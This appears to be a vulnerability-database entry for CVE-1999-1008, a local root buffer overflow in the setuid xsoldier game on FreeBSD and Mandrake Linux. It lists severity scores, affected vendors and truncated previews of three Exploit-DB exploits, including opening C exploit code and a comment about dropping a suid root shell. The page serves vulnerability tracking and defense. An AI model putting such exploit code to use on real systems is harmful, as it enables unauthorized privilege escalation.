CVE-1999-1008
Published 2000-05-17
CVE-1999-1008: xsoldier program allows local users to gain root access via a long argument.
Priority P423 | high | 7.2 (CVSS 2.0)
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 0.73% (49.7th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| mandrakesoft | mandrake_linux | — | — |
No detection rules found.
Exploit-DB
xsoldier 0.96 (RedHat 6.2) - Local Buffer Overflow
exploitdb·2000-12-15
---
#include
#include
#define NOP 0x90
#define BUFSIZE 4408
#define OFFSET 0
#define RANGE 20
long get_sp () { __asm__ ("mov %esp, %eax"); }
int
main (int argc, char *argv[])
{
char buffer[BUFSIZE];
int i, offset;
unsigned long re
Exploit-DB
xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (1)
exploitdb·2000-05-17
---
// source: https://www.securityfocus.com/bid/871/info
Certain versions of FreeBSD (3.3 confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary in question, the game xsoldier, is setuid root and is meant to be run from an X Windows console.
The binary is subject to a buffer overflow that can be triggered from the command line to gain root privileges. The overflow is in the code that handles the -display option and is triggered by a long user-supplied string.
The user does not need a valid $DISPLAY to exploit this.
/*
* xsoldier exploit for Freebsd-3.3-RELEASE
* Drops a suid root shell in /bin/
Exploit-DB
xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (2)
exploitdb·2000-05-17
---
/*
source: https://www.securityfocus.com/bid/871/info
*/
/*Larry W. Cashdollar linux xsolider exploit.
*[email protected] http://vapid
No writeups or analysis indexed.
Published: 2000-05-17